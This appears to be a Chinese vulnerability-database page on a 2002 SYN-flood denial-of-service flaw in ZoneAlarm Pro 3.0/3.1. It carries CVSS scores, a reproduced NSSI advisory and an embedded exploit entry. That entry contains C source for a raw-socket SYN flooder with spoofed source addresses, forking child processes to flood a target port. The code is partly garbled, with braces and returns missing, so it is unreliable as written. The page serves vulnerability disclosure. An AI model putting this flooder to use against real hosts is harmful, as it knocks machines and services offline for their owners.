发布时间 :2002-12-31 00:00:00
修订时间 :2008-09-05 16:31:49

[原文]ZoneAlarm Pro 3.0 and 3.1, when configured to block all traffic, allows remote attackers to cause a denial of service (CPU and memory consumption) via a large number of SYN packets (SYN flood). NOTE: the vendor was not able to reproduce the issue.

[CNNVD]Zone Labs ZoneAlarm Syn淹没远程拒绝服务攻击漏洞(CNNVD-200212-726)

        ZoneAlarm是由Zone Labs开发和维护的个人防火墙系统。

- CVSS (基础分值)

CVSS分值: 5 [中等(MEDIUM)]
机密性影响: NONE [对系统的机密性无影响]
完整性影响: NONE [不会对系统完整性产生影响]
可用性影响: PARTIAL [可能会导致性能下降或中断资源访问]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: [--]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)


- OVAL (用于检测的技术细节)


- 官方数据库链接
(官方数据源) MITRE
(官方数据源) NVD
(官方数据源) CNNVD

- 其它链接及资源
(UNKNOWN)  BID  5975
(UNKNOWN)  XF  zonealarm-synflood-dos(10379)
(UNKNOWN)  BUGTRAQ  20021017 Re: NSSI-2002-zonealarm3: ZoneAlarm Pro Denial of Service Vulnerability

- 漏洞信息

Zone Labs ZoneAlarm Syn淹没远程拒绝服务攻击漏洞
中危 其他
2002-12-31 00:00:00 2005-10-20 00:00:00
        ZoneAlarm是由Zone Labs开发和维护的个人防火墙系统。

- 公告与补丁

        Zone Labs

- 漏洞信息 (21943)

Zone Labs ZoneAlarm 3.0/3.1 Syn Flood Denial Of Service Vulnerability (EDBID:21943)
windows dos
2002-10-16 Verified
0 Abraham Lincoln
N/A [点击下载]

ZoneAlarm is a firewall software package designed for Microsoft Windows operating systems. It is distributed and maintained by Zone Labs.

ZoneAlarm does not properly handle some types of traffic. When ZoneAlarm is configured to block all traffic, and a Syn flood of 300 or more packets is sent to a host running the vulnerable software, the system becomes unstable. This problem has been reported as leading to a denial of service condition. 

Start Advisory
NSSI Technologies Inc Research Labs Security Advisory (Philippines / .ph) 
"Maximum e-security"
ZoneAlarm Pro 3.1 and 3.0 Denial of Service Vulnerability
Author: Abraham Lincoln Hao / SunNinja
e-Mail: /
Advisory Code: NSSI-2002-zonealarm3 
Tested: Under Win2k Advance Server with SP3 / WinNT 4.0 with SP6a / Win2K Professional / WinNT 4.0 workstation 
Vendor Status:  Zone Labs is already contacted 1 month ago and they informed me that they going to release an update or new version to patched the problem. 
This vulnerability is confirmed by the vendor.
Vendors website:
Severity: High


New ZoneAlarm� Pro delivers twice the securityZone Labs award-winning, personal firewall trusted by millions, plus advanced privacy features. 
the award-winning PC firewall that blocks intrusion attempts and protects against Internet-borne threats like worms, Trojan horses, and spyware.   
ZoneAlarm Pro 3.1 and 3.0  doubles your protection with enhanced Ad Blocking and expanded Cookie Control to speed up your Internet experience and stop 
Web site spying. Get protected. Compatible with Microsoft� Windows� 98/Me/NT/2000 and XP.    
ZoneAlarm Pro 3.1.291 and 3.0  contains vulnerability that would let the attacker consume all your CPU and Memory usage that would result to Denial of 
Service Attack through sending  multiple syn packets / synflooding.  


Zone-Labs ZoneAlarm Pro 3.1.291 and 3.0 contains a vulnerability that would let the attacker consume all your CPU and Memory usage that would result to 
Denial of Service Attack through Synflooding that would cause the machine to stop from responding. Zone-Labs ZoneAlarm Pro 3.1.291 and 3.0 is also vulnerable 
with IP Spoofing. This Vulnerabilities are confirmed from the vendor.

Test diagram:
[*Nix b0x with IP Spoofing scanner / Flooder] <===[10/100mbps switch===> [Host with ZoneAlarm] 
 1] Tested under default install of the 2 versions after sending minimum of 300 Syn Packets to port 1-1024 the machine will hang-up until the attack stopped.
2] We configured the ZoneAlarm firewall both version to BLOCK ALL traffic setting after sending a minimum of 300 Syn Packets to port  1-1024 the machine will
hang-up until the attack stopped. 

Disable ZoneAlarm and Hardened TCP/IP stack of your windows and Install latest Security patch.
Note: To people who's having problem reproducing the vulnerability let me know :)
Any Questions? Suggestions? or Comments? let us know. 
e-mail: / /
nssilabs team, especially to b45h3r and rj45, Most skilled and pioneers of NSSI good luck!. 
( /,  Lawless the saint ;), dig0, p1x3l, dc and most of all to my Lorie.  
End Advisory

L-zonealarm.c compile with gcc l-zonealarm.c -o l-zonealarm
greets        Valk , harada ,bono-sad , my family .

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <time.h>
#include <strings.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in_systm.h>
#include <netinet/in.h>
#include <netinet/ip.h>
#include <netinet/tcp.h>
#include <arpa/inet.h>
#include <netdb.h>
#include <errno.h>

#define MAX_CHILDREN            30

void die(char *msg)

void usage()
		  "[*] Zone Alarm dos coded by lupsyn [*]\n"
                  "[*] Usage ./l-za srcIP dstIP port  [*]\n"

u_short in_cksum(u_short *addr, int len)    /* function is from ping.c */
    register int nleft = len;
    register u_short *w = addr;
    register int sum = 0;
    u_short answer =0;
    while (nleft > 1) 
       	sum += *w++;
       	nleft -= 2;
    if (nleft == 1) 
       	*(u_char *)(&answer) = *(u_char *)w;
        sum += answer;
    sum = (sum >> 16) + (sum & 0xffff);
    sum += (sum >> 16);
    answer = ~sum;

u_long getaddr(char *hostname)    
	struct hostent *hp;
	if ((hp = gethostbyname(hostname)) == NULL) 
        fprintf(stderr, "Could not resolve %s.\n", hostname);
    	return *(u_long *)hp->h_addr;

void dosynpacket(unsigned char *source_addr, unsigned char *dest_addr, int dest_port)
	struct send_tcp
      	struct iphdr ip;
      	struct tcphdr tcp;
   	} send_tcp;
	struct pseudo_header
      	unsigned int source_address;
      	unsigned int dest_address;
      	unsigned char placeholder;
      	unsigned char protocol;
      	unsigned short tcp_length;
      	struct tcphdr tcp;
   	} pseudo_header;
	int tcp_socket;
   	struct sockaddr_in sin;
   	int sinlen;
   	/* form ip packet */
   	send_tcp.ip.ihl = 5;
   	send_tcp.ip.version = 4;
   	send_tcp.ip.tos = 0;
   	send_tcp.ip.tot_len = htons(40);
   	send_tcp.ip.frag_off = 0;
   	send_tcp.ip.ttl = 255;
   	send_tcp.ip.protocol = IPPROTO_TCP;
   	send_tcp.ip.check = 0;
   	send_tcp.ip.saddr =inet_addr(source_addr);
   	send_tcp.ip.daddr =inet_addr(dest_addr);
   	/* form tcp packet */
   	send_tcp.tcp.dest = htons(dest_port);
   	send_tcp.tcp.ack_seq = 0;
   	send_tcp.tcp.res1 = 0;
   	send_tcp.tcp.doff = 5;
   	send_tcp.tcp.fin = 0;
   	send_tcp.tcp.syn = 1;
   	send_tcp.tcp.rst = 0;
   	send_tcp.tcp.psh = 0;
   	send_tcp.tcp.ack = 0;
   	send_tcp.tcp.urg = 0;
   	send_tcp.tcp.res2 = 0;
   	send_tcp.tcp.window = htons(512);
   	send_tcp.tcp.check = 0;
   	send_tcp.tcp.urg_ptr = 0;
   	/* setup the sin struct */
   	sin.sin_family = AF_INET;
   	sin.sin_port = send_tcp.tcp.source;
   	sin.sin_addr.s_addr = send_tcp.ip.daddr;   
   	/* (try to) open the socket */
        if((tcp_socket = socket(AF_INET, SOCK_RAW, IPPROTO_RAW))<0) die("socket");
      	/* set fields that need to be changed */
      	send_tcp.tcp.check = 0;
      	send_tcp.ip.check = 0;
      	/* calculate the ip checksum */
      	send_tcp.ip.check = in_cksum((unsigned short *)&send_tcp.ip, 20);

      	/* set the pseudo header fields */
      	pseudo_header.source_address = send_tcp.ip.saddr;
     	pseudo_header.dest_address = send_tcp.ip.daddr;
      	pseudo_header.placeholder = 0;
      	pseudo_header.protocol = IPPROTO_TCP;
      	pseudo_header.tcp_length = htons(20);
      	bcopy((char *)&send_tcp.tcp, (char *)&pseudo_header.tcp, 20);
      	send_tcp.tcp.check = in_cksum((unsigned short *)&pseudo_header, 32);
      	sinlen = sizeof(sin);
      	if((sendto(tcp_socket, &send_tcp, 40, 0, (struct sockaddr *)&sin, sinlen))<0) die("sendto");

main(int argc, char *argv[])

	int i=0,childs;
	if (argc<3) usage();
	fprintf (stdout,"\n[*] Let's start dos  [*]\n");
     	fprintf (stdout,  "[*] Wait 30 sec and after try ping %s at port %d [*]\n",argv[2],atoi(argv[3]));
        fprintf (stdout,  "[*]    [*]\n");
	fprintf (stdout,  "[*] esc with ctrl+c  [*]\n\n");

	for (i ; i<400 ;i++)
		if(childs >= MAX_CHILDREN) wait(NULL) ;
		switch (fork())
				case 0:
                        	case -1:

	}while(childs--) wait(NULL);

- 漏洞信息

ZoneAlarm Pro SYN Flood Remote DoS
Remote / Network Access Denial of Service
Loss of Availability
Vendor Disputed

- 漏洞描述

- 时间线

2002-10-16 Unknow
Unknow Unknow

- 解决方案


Unknown or Incomplete

- 相关参考

- 漏洞作者

Unknown or Incomplete